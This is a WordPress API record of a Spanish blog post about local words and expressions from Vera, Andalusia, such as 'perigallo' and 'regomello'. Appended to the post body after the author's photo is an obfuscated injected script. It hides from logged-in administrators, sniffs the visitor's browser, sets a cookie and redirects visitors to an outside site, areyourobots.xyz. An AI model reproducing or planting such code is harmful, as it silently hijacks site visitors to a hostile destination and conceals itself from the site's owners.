{"id":432,"date":"2014-05-22T17:48:43","date_gmt":"2014-05-22T17:48:43","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=432"},"modified":"2015-11-23T10:33:57","modified_gmt":"2015-11-23T10:33:57","slug":"localismos-con-la-marca-vera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/05\/22\/localismos-con-la-marca-vera\/","title":{"rendered":"LOCALISMOS CON LA MARCA VERA"},"content":{"rendered":"<p><!-- p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; widows: 2; orphans: 2; }a:link { color: rgb(0, 0, 255); } --><\/p>\n<p style=\"text-align: justify\" align=\"justify\">Profundizando en el estudio de nuestra peculiar forma de hablar, me viene a la memoria recordar que, oyendo Canal Sur Radio, un programa radiof\u00f3nico suscit\u00f3 mi inter\u00e9s por el tema objeto de lo que en \u00e9l se debat\u00eda: la confecci\u00f3n de un <i><b>diccionario andaluz<\/b><\/i> con palabras aut\u00f3ctonas de los pueblos de nuestra Comunidad. El programa, abierto a su participaci\u00f3n, supuso que muchos radioyentes interviniesen en la tertulia tras su emisi\u00f3n. \u00c9sta, amena por interesante, ante el c\u00famulo de llamadas, hizo que muchas de ellas quedaran fuera de onda por saturaci\u00f3n. As\u00ed las cosas, tras una larga hora de intervenciones, los radioyentes, en el transcurso del coloquio, iban incorporando a ese diccionario andaluz vocablos y expresiones propias de su lugar de origen o procedencia, es decir, lo que para conocimiento del lector, ling\u00fc\u00edsticamente hablando, viene a llamarse localismo.<\/p>\n<p style=\"text-align: justify\" align=\"justify\"><!--more--><\/p>\n<p style=\"text-align: justify\" align=\"justify\">Pic\u00e1ndome la curiosidad y siendo improbable la recepci\u00f3n de mi llamada, prob\u00e9 fortuna y, sorpresivamente, hab\u00eda sido retenida por momentos, seg\u00fan me comunicaron, para su inmediata entrada en onda. \u201cIpso facto\u201d, valga el latinajo, el director del programa, tras preguntar por mi nombre, profesi\u00f3n y procedencia, me interrog\u00f3 sobre mi aportaci\u00f3n de vocablos al diccionario y, en mi contestaci\u00f3n, en honor a la verdad, le dije los que de ni\u00f1o, con frecuencia, sol\u00eda o\u00edr y eran habituales en el habla de Vera. Estos vocablos eran: <i>\u201c<\/i><i><b>paleta\u201d<\/b><\/i> por valla; <i>\u201c<\/i><i><b>nulo\u201d<\/b><\/i><b> <\/b>por nublado; y <i>\u201c<\/i><i><b>perigallo\u201d<\/b><\/i> por escalera de madera abatible.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Al cabo de un tiempo, tras comentar este episodio que relato a mis amigos, e interes\u00e1ndose \u00e9stos si las palabras mencionadas hab\u00edan sido incorporadas al diccionario, pude decirles que s\u00f3lo y exclusivamente una gozaba de tal privilegio:<i><b>\u201dperigallo\u201d<\/b><\/i>.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Pues bien, metido en faena y recabando informaci\u00f3n al caso que me ocupa, ahora, c\u00f3mo no, s\u00ed que puedo anexionar otras que forman parte del glosario de palabras relacionadas con nuestra poblaci\u00f3n, cuales son: <i><b>\u201cmel\u00f3n de agua\u201d<\/b><\/i> por sand\u00eda; <i><b>\u201cmel\u00f3n de invierno\u201d<\/b><\/i> por, simplemente, mel\u00f3n; <i><b>\u201ccuajadera\u201d<\/b><\/i> por asado de carne o pescado<i>; <\/i><i><b>\u201cmiajica\u201d<\/b><\/i> por peque\u00f1a porci\u00f3n de algo; <i><b>\u201cbrenca\u201d<\/b><\/i> por arista entre dos paredes; <i><b>\u201cregomello\u201d<\/b><\/i> por pesadumbre; <i><b>\u201ca norre\u201d<\/b><\/i> por sin l\u00edmite; <i><b>\u201csolostrar\u201d<\/b><\/i> por soportar; <i><b>\u201cleja\u201d<\/b><\/i><b> <\/b>por repisa o estante; <i><b>\u201caburrici\u00f3n\u201d<\/b><\/i> por aburrimiento; <i><b>\u201cencont\u00e1\u201d<\/b><\/i> por en cuanto; <i><b>\u201cpa\u201d<\/b><\/i> por para; <i><b>\u201ca ca\u201d<\/b><\/i> por a casa de; <i><b>\u201cresollar\u201d<\/b><\/i> por silenciar, callar; <i><b>\u201ccascar\u201d<\/b><\/i> por charlar; <i><b>\u201cclisado\u201d<\/b><\/i> por atontado, dormido; <i><b>\u201ccargante\u201d<\/b><\/i><b> <\/b>y<b> <\/b><i><b>\u201cempalagoso\u201d<\/b><\/i> por pesado; <i><b>\u201ccarlear\u201d<\/b><\/i> por jadear, asfixiar; <i><b>\u201carregostar\u201d<\/b><\/i> por acostumbrar; <i><b>\u201ctumbo\u201d<\/b><\/i> por f\u00e9retro, ata\u00fad; <i><b>\u201cchambi\u201d<\/b><\/i> por helado en forma de \u201cs\u00e1ndwich\u201d; <i><b>\u201cpostizas\u201d <\/b><\/i>por casta\u00f1uelas; <i><b>\u201cpeazo\u201d<\/b><\/i> por pedazo; <i><b>\u201crepullo\u201d<\/b><\/i> por susto; <i><b>\u201cfaratute\u201d<\/b><\/i> por desmayo; y algunas que otras expresiones como <i><b>\u201cojosol\u201d<\/b><\/i> por quemarse expuesto al sol; <i><b>\u201ca pajera abierta\u201d<\/b><\/i><i> <\/i>por buffet libre<b>; <\/b><i><b>\u201ccortar sin navaja\u201d<\/b><\/i><b> <\/b>por pisar accidentalmente un excremento; <i><b>\u201canda que te zurzan\u201d <\/b><\/i>por anda que te den&#8230;; <i><b>\u201cvaya azogue que tienes\u201d<\/b><\/i> por vaya nervios que tienes; <i><b>\u201cse te ve el plumero\u201d<\/b><\/i> por se te ve venir; <i><b>\u201cno me esquiles\u201d<\/b><\/i> por no me fastidies. Todos estos localismos, si la p\u00e1gina web de referencia me lo permite, para gozo de mis amigos y m\u00edo propio, tratar\u00e9 de incorporarlos como vocablos de la marca Vera.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Por otra parte, ni que decir tiene que de todas las regiones de Espa\u00f1a, Andaluc\u00eda se \u201clleva la palma\u201d por su peculiar forma de hablar: <i><b>seseo<\/b><\/i>, <i><b>ceceo<\/b><\/i>, terminaciones de los participios pasados regulares de los verbos &#8211; <i><b>ado<\/b><\/i>, <i><b>ido-<\/b><\/i> por &#8211;<i><b>\u201cao\u201d<\/b><\/i>, <i><b>\u201c\u00edo-\u201d<\/b><\/i>, as\u00ed<b> <\/b>como partes de la oraci\u00f3n indebidamente pronunciadas,- <i><b>todo<\/b><\/i> por <i><b>\u201cto\u201d<\/b><\/i>, <i><b>nada<\/b><\/i> por <i><b>\u201cna\u201d<\/b><\/i><b>&#8211;<\/b>, etc. y un sinf\u00edn de etc\u00e9teras. En resumidas cuentas, somos muy particulares, muy nuestros y a estas singularidades propias, algunos, no todos, le llaman idioma; otros muchos, dialecto andaluz; y, pocos, malformaciones del castellano; pero, claro est\u00e1, esto que digo es \u201charina de otro costal\u201d y ser\u00eda objeto de estudio y atenci\u00f3n para la publicaci\u00f3n de otro art\u00edculo.<\/p>\n<p><figure id=\"attachment_23\" aria-describedby=\"caption-attachment-23\" style=\"width: 180px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\"><img decoding=\"async\" class=\"size-full wp-image-23\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\" alt=\"Diego Morales Carmona\" width=\"180\" height=\"109\" \/><\/a><figcaption id=\"caption-attachment-23\" class=\"wp-caption-text\">Diego Morales Carmona<\/figcaption><\/figure><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Profundizando en el estudio de nuestra peculiar forma de hablar, me viene a la memoria recordar que, oyendo Canal Sur Radio, un programa radiof\u00f3nico suscit\u00f3 mi inter\u00e9s por el tema objeto de lo que en \u00e9l se debat\u00eda: la confecci\u00f3n de un diccionario andaluz con palabras aut\u00f3ctonas de los pueblos de nuestra Comunidad. El programa, &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/05\/22\/localismos-con-la-marca-vera\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">LOCALISMOS CON LA MARCA VERA<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":433,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"class_list":["post-432","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=432"}],"version-history":[{"count":2,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/432\/revisions"}],"predecessor-version":[{"id":1689,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/432\/revisions\/1689"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/433"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}